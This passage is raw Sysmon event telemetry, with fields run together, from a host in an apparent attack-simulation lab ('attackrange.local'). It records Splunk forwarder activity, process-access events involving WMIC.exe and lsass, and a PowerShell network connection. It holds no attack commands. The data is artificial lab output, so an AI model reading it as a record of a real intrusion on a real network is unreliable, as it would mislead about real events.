Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD1255ED795AB81AA5A1B4DFF4FD539D,SHA256=56B3097A6492833F9617D0667A33DF1F0ABEA63618E730367ED7C243BC52F549,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128644Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:26.963{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC38309AC855387326206DC6242C8B1E,SHA256=BABA2269A6091DC710CF5187DF46BE6CA59E7BE57B49F647C8A5C30826974ADF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035128643Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:26.862{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-83BE-613A-E096-03000000C801}1040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128642Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:26.860{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128641Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:26.859{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128640Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:26.859{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128639Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:26.859{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128638Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:26.859{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-83BE-613A-E096-03000000C801}1040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035128637Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:26.859{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-83BE-613A-E096-03000000C801}1040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035128636Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:26.843{B81B27B7-83BE-613A-E096-03000000C801}1040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035128635Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:26.327{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B4396B615D9BB94A75563EB219D19C9E,SHA256=8EE89FEF109E46031C7BB1DE849D9E9015424BC60E595741C98A51B5EAD95545,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128656Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:27.842{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BF5498A98393EBA0A2FE2D6F38538A6F,SHA256=A355AF8BBA49992CBAB0D788590918F00A7F7406A5D87A16C1C5EBAE68859A31,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128655Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:27.842{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CFE504F7276A03D436F12889793A9FB4,SHA256=84792419ED0BC9B363E221693A4C098CDEA47DCBB6642095AF9C9A4A5EC7FCEE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128654Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:51.480{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62187-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000035128653Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:27.480{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-83BF-613A-E196-03000000C801}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128652Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:27.465{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128651Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:27.465{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128650Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:27.465{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-83BF-613A-E196-03000000C801}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035128649Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:27.465{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128648Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:27.465{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128647Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:27.465{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-83BF-613A-E196-03000000C801}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035128646Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:27.460{B81B27B7-83BF-613A-E196-03000000C801}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000035128645Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:27.012{B81B27B7-83BE-613A-E096-03000000C801}10406612C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000035128658Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:53.425{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62188-false10.0.1.12-8000- 23542300x800000000000000035128657Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:27.995{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=766C0E8E3F7DAEC85CA1F1A6B427927D,SHA256=0C09B0B92930B0C97CDAA61067460443FCF0A9A7E5A8BCEDA0BFE3E1C3DC2DD3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128659Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:29.041{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B7591F596185A83A74023AC72AE725C,SHA256=00A6D89DA6A2DB40D7BA1E40DC434D693541B7BE4B9326A5FFBD04FF8FC9566F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035128673Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:30.358{B81B27B7-4013-611D-1600-00000000C801}11963536C:\Windows\system32\svchost.exe{B81B27B7-83C2-613A-E296-03000000C801}624C:\Windows\System32\Wbem\WMIC.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128672Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:30.358{B81B27B7-4013-611D-1600-00000000C801}11961244C:\Windows\system32\svchost.exe{B81B27B7-83C2-613A-E296-03000000C801}624C:\Windows\System32\Wbem\WMIC.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128671Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:30.340{B81B27B7-4012-611D-0B00-00000000C801}6364628C:\Windows\system32\lsass.exe{B81B27B7-83C2-613A-E296-03000000C801}624C:\Windows\System32\Wbem\WMIC.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128670Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:30.340{B81B27B7-4012-611D-0B00-00000000C801}6364628C:\Windows\system32\lsass.exe{B81B27B7-83C2-613A-E296-03000000C801}624C:\Windows\System32\Wbem\WMIC.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128669Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:30.324{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-83C2-613A-E296-03000000C801}624C:\Windows\System32\Wbem\WMIC.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128668Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:30.324{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-83C2-613A-E296-03000000C801}624C:\Windows\System32\Wbem\WMIC.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128667Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:30.324{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128666Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 